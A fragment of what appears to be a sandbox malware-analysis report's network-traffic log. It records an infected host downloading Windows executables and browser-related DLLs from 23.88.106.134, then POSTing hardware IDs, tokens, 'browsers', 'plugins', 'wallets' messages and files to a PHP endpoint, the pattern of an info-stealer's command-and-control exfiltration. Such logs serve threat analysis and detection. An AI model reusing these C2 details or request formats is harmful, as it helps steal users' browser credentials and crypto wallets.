00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Jun 2024 18:22:06 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Jun 2024 18:22:07 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Jun 2024 18:22:07 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJEGIJEGDBFHDGCAFCAEHost: 23.88.106.134Content-Length: 213Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 31 39 36 30 37 37 37 34 43 43 36 36 31 31 37 39 33 34 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 63 75 61 70 66 73 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 2d 2d 0d 0a Data Ascii: ------JJEGIJEGDBFHDGCAFCAEContent-Disposition: form-data; name="hwid"8C19607774CC661179348------JJEGIJEGDBFHDGCAFCAEContent-Disposition: form-data; name="build"cuapfss------JJEGIJEGDBFHDGCAFCAE--
                        Source: global trafficHTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGHJEBFBFHIIECAECGHHost: 23.88.106.134Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 48 4a 45 42 46 42 46 48 49 49 45 43 41 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 61 34 39 31 64 65 62 39 32 62 63 34 61 32 30 37 38 61 30 63 32 35 62 61 62 62 61 33 35 62 30 61 66 31 66 37 63 39 61 66 63 35 31 33 65 34 33 30 34 39 61 32 34 63 34 66 38 61 35 36 66 66 32 34 66 62 38 36 61 30 62 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 48 4a 45 42 46 42 46 48 49 49 45 43 41 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 48 4a 45 42 46 42 46 48 49 49 45 43 41 45 43 47 48 2d 2d 0d 0a Data Ascii: ------HDGHJEBFBFHIIECAECGHContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------HDGHJEBFBFHIIECAECGHContent-Disposition: form-data; name="message"browsers------HDGHJEBFBFHIIECAECGH--
                        Source: global trafficHTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAFIJDGHCBFHJKFCGIEHost: 23.88.106.134Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 61 34 39 31 64 65 62 39 32 62 63 34 61 32 30 37 38 61 30 63 32 35 62 61 62 62 61 33 35 62 30 61 66 31 66 37 63 39 61 66 63 35 31 33 65 34 33 30 34 39 61 32 34 63 34 66 38 61 35 36 66 66 32 34 66 62 38 36 61 30 62 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 2d 2d 0d 0a Data Ascii: ------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="message"plugins------HCAFIJDGHCBFHJKFCGIE--
                        Source: global trafficHTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJKJDAKEHJDGDGDGHIDHost: 23.88.106.134Content-Length: 6767Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /566d6e1ec8db6394/sqlite3.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJJJDHIDBGHIDHIDAFBHost: 23.88.106.134Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGIDHost: 23.88.106.134Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDBFBFHJDGCAKEGHJEHost: 23.88.106.134Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 42 46 42 46 48 4a 44 47 43 41 4b 45 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 61 34 39 31 64 65 62 39 32 62 63 34 61 32 30 37 38 61 30 63 32 35 62 61 62 62 61 33 35 62 30 61 66 31 66 37 63 39 61 66 63 35 31 33 65 34 33 30 34 39 61 32 34 63 34 66 38 61 35 36 66 66 32 34 66 62 38 36 61 30 62 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 42 46 42 46 48 4a 44 47 43 41 4b 45 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 42 46 42 46 48 4a 44 47 43 41 4b 45 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 42 46 42 46 48 4a 44 47 43 41 4b 45 47 48 4a 45 2d 2d 0d 0a Data Ascii: ------EGIDBFBFHJDGCAKEGHJEContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------EGIDBFBFHJDGCAKEGHJEContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------EGIDBFBFHJDGCAKEGHJEContent-Disposition: form-data; name="file"------EGIDBFBFHJDGCAKEGHJE--
                        Source: global trafficHTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAKKKKJDBKKFIEBKEHDHost: 23.88.106.134Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 61 34 39 31 64 65 62 39 32 62 63 34 61 32 30 37 38 61 30 63 32 35 62 61 62 62 61 33 35 62 30 61 66 31 66 37 63 39 61 66 63 35 31 33 65 34 33 30 34 39 61 32 34 63 34 66 38 61 35 36 66 66 32 34 66 62 38 36 61 30 62 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 2d 2d 0d 0a Data Ascii: ------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="file"------ECAKKKKJDBKKFIEBKEHD--
                        Source: global trafficHTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAKKKKJDBKKFIEBKEHDHost: 23.88.106.134Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 61 34 39 31 64 65 62 39 32 62 63 34 61 32 30 37 38 61 30 63 32 35 62 61 62 62 61 33 35 62 30 61 66 31 66 37 63 39 61 66 63 35 31 33 65 34 33 30 34 39 61 32 34 63 34 66 38 61 35 36 66 66 32 34 66 62 38 36 61 30 62 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 2d 2d 0d 0a Data Ascii: ------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="file"------ECAKKKKJDBKKFIEBKEHD--
                        Source: global trafficHTTP traffic detected: GET /566d6e1ec8db6394/freebl3.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /566d6e1ec8db6394/mozglue.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /566d6e1ec8db6394/msvcp140.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /566d6e1ec8db6394/nss3.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /566d6e1ec8db6394/softokn3.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /566d6e1ec8db6394/vcruntime140.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGIDHost: 23.88.106.134Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBAKKECAEGCAKFIIIDHHost: 23.88.106.134Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 42 41 4b 4b 45 43 41 45 47 43 41 4b 46 49 49 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 61 34 39 31 64 65 62 39 32 62 63 34 61 32 30 37 38 61 30 63 32 35 62 61 62 62 61 33 35 62 30 61 66 31 66 37 63 39 61 66 63 35 31 33 65 34 33 30 34 39 61 32 34 63 34 66 38 61 35 36 66 66 32 34 66 62 38 36 61 30 62 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 41 4b 4b 45 43 41 45 47 43 41 4b 46 49 49 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 41 4b 4b 45 43 41 45 47 43 41 4b 46 49 49 49 44 48 2d 2d 0d 0a Data Ascii: ------IDBAKKECAEGCAKFIIIDHContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------IDBAKKECAEGCAKFIIIDHContent-Disposition: form-data; name="message"wallets------IDBAKKECAEGCAKFIIIDH--
